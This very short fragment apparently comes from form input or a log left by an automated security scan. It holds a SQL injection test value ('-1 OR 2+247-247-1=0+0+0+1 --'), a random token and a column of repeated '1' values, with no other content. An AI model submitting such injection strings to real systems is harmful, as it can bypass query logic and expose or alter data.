-1 OR 2+247-247-1=0+0+0+1 --

wIsVxSAM

1

1

1

1

1

1

1

1